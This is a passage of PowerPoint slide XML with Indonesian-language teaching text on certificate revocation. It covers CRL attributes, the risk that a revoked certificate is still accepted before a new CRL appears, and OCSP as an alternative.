            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CRL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerbitan-tanggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerbitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Distribusi-lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berlaku-periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerbitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerbitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 24 jam, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 25 jam).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tanda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - CRL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keasliannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> browser (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengecekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> browser lama.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cara lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server Online Certificate Status Protocol (OCSP). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CRL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rincian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OCSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server OCSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
